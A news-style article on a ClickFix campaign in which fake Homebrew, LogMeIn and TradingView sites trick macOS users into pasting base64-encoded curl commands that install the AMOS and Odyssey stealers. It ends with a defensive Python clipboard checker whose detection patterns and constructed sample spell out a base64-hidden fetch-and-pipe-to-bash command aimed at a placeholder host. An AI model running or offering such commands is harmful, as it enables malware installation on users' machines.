Cybersecurity researchers have uncovered a sophisticated malicious campaign that targets macOS developers by impersonating legitimate platforms such as Homebrew, LogMeIn, and TradingView. The threat actors use deceptive tactics, including ‘ClickFix’ methods, to manipulate users into running malicious terminal commands that install malware such as AMOS (Atomic macOS Stealer) and Odyssey. Hunt.io researchers identified over 85 domains associated with this campaign, all mimicking the genuine services to lure users into downloading malicious software.

Threat hunters from Hunt.io found that some of these domains are promoted through Google Ads, which makes them appear in search results. This lets the attackers reach a broader audience and increases the likelihood of successful infections, and it highlights a growing trend of exploiting advertising networks for cyberattacks.

The malicious sites are designed to look authentic, featuring convincing download portals and instructions for users to copy and run a curl command in Terminal. In some cases, the command is presented as a ‘connection security confirmation step’ for TradingView, but clicking the ‘copy’ button copies a base64-encoded installation command to the clipboard instead of the genuine Cloudflare verification ID.

This deceptive approach underscores the evolving sophistication of cyber threats and the need for heightened security awareness among macOS users. The incident also raises concerns about the misuse of advertising platforms to spread malware, and it emphasizes the importance of verifying the authenticity of websites and of any command before it is run in a command-line interface.
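As an added example (not code from Hunt.io or from the article), the following Python check inspects clipboard text before it is pasted into Terminal: it decodes any base64 run without executing it, flags a downloader whose output is handed to a shell, and lists the hosts involved. The function names, regexes, the 24-character threshold and the sample strings are assumptions constructed for this illustration.

```python
import base64
import binascii
import re

# Base64 runs long enough to hide a command (the 24-char threshold is an assumption).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
DECODE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
FETCH = re.compile(r"\b(?:curl|wget)\b")
# Output handed to a shell: a pipe into sh/bash/zsh, `sh -c`, $(...) or backticks.
TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b|\b(?:ba|z)?sh\s+-c\b|\$\(|`")
HOST = re.compile(r"https?://([^/\s\"')]+)")

def decode_blobs(text):
    """Return printable text recovered from base64 runs; nothing is executed."""
    found = []
    for run in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            decoded = raw.decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found

def inspect_clipboard(text):
    """Classify text copied from a web page before it is pasted into Terminal."""
    decoded = decode_blobs(text)
    layers = [text] + decoded  # the visible command plus anything hidden inside it
    reasons = []
    if decoded and DECODE.search(text):
        reasons.append("base64 payload decoded at run time")
    if any(FETCH.search(layer) and TO_SHELL.search(layer) for layer in layers):
        reasons.append("remote script fetched and run by a shell")
    hosts = sorted({h for layer in layers for h in HOST.findall(layer)})
    return {"suspicious": bool(reasons), "reasons": reasons,
            "decoded": decoded, "hosts": hosts}

# Constructed samples (placeholder domain, made-up ID format).
INNER = "curl -fsSL https://example.invalid/install.sh | bash"
SAMPLE_CLICKFIX = 'echo "%s" | base64 -d | bash' % base64.b64encode(INNER.encode()).decode()
SAMPLE_EXPECTED_ID = "7f3a9c2e-verification-id-41d8"

if __name__ == "__main__":
    for sample in (SAMPLE_CLICKFIX, SAMPLE_EXPECTED_ID):
        print(inspect_clipboard(sample))
```

The genuine Homebrew installer also fetches a script and hands it to bash, so a flag here means comparing the listed host with the vendor's real domain rather than treating the command's shape alone as proof of malice.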